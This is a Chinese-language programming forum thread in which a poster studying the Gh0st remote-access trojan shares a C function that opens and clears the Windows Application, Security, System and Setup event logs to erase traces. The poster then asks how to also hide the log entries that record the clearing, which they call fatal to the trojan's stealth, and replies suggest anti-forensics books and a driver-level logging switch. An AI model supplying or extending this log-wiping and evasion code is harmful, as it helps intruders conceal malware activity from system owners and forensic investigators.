VC驿站

 找回密码
 加入驿站

QQ登录

只需一步,快速开始

搜索
查看: 1364|回复: 4

[交流] 关于Gh0st清理事件查看器

[复制链接]
75_avatar_middle
最佳答案
18 
online_supermod 发表于 2019-12-1 10:51:56 | 显示全部楼层 |阅读模式
最近在学习Gh0st程序发现一个问题那就是当我们用
void CleanEvent()
{
        char*strEvent[] = { "Application","Security","System","Setup" };
        for (int i = 0; i < sizeof(strEvent) / sizeof(char*); i++)
        {
                HANDLE hHandle = OpenEventLog(NULL, strEvent[i]);
                if (hHandle == NULL)
                {
                        continue;
                }
                ClearEventLog(hHandle, NULL);//清理打开的时间日志
                CloseEventLog(hHandle);//关闭事件句柄
        }
}
清理我们留下的痕迹时  还是会留下两条痕迹看图,  也没有那种方法能彻底抹掉后面出现的2条痕迹,或者躲过
痕迹.png
Ghst.png




上一篇:关于指针不明白的地方,求教大牛。 万分感谢
下一篇:今日一贴!清理系统事件查看器,新手观摩。
75_avatar_middle
最佳答案
18 
ico_lz  楼主| 发表于 2019-12-1 10:53:37 | 显示全部楼层
我执行完123步骤的时候  我清理了我想清理的痕迹,但是最后在系统事件中出现了,我清理事件的痕迹,这对于木马的隐藏性是致命的,这样人家就知道你清理了该事件,并且在事件详细中列出了详细信息,清理时间,以及ID和hostname
58_avatar_middle
最佳答案
43 
online_vip 发表于 2019-12-1 12:04:36 | 显示全部楼层
wl1383838438 发表于 2019-12-1 10:53
我执行完123步骤的时候  我清理了我想清理的痕迹,但是最后在系统事件中出现了,我清理事件的痕迹,这对于 ...


Windows好像有对日志处理的API,也有些取证、反取证书籍,我没研究过,你找找吧。
75_avatar_middle
最佳答案
18 
ico_lz  楼主| 发表于 2019-12-1 14:31:36 | 显示全部楼层
thzzl 发表于 2019-12-1 12:04
Windows好像有对日志处理的API,也有些取证、反取证书籍,我没研究过,你找找吧。

一个老道友,推荐了大概方向说是驱动层有个系统日志开关,可设置,并未详细水,我也不好问太细,毕竟驱动哪块自己是完全不懂,人家也没有办法详细说!谢谢老哥解答
58_avatar_middle
最佳答案
43 
online_vip 发表于 2019-12-1 14:33:53 | 显示全部楼层
wl1383838438 发表于 2019-12-1 14:31
一个老道友,推荐了大概方向说是驱动层有个系统日志开关,可设置,并未详细水,我也不好问太细,毕竟驱动 ...

API层好像也有相应操作,慢慢来吧。
您需要登录后才可以回帖 登录 | 加入驿站 qq_login

本版积分规则

×【发帖 友情提示】
1、请回复有意义的内容,请勿恶意灌水;
2、纯数字、字母、表情等无意义的内容系统将自动删除;
3、若正常回复后帖子被自动删除,为系统误删的情况,请重新回复其他正常内容或等待管理员审核通过后会自动发布;
4、感谢您对VC驿站一如既往的支持,谢谢合作!

关闭

站长提醒上一条 /2 下一条

QQ|小黑屋|手机版|VC驿站 ( 辽ICP备09019393号 )|网站地图wx_jqr

GMT+8, 2020-9-24 15:39

Powered by CcTry.CoM

© 2009-2020 cctry.com

快速回复 返回顶部 返回列表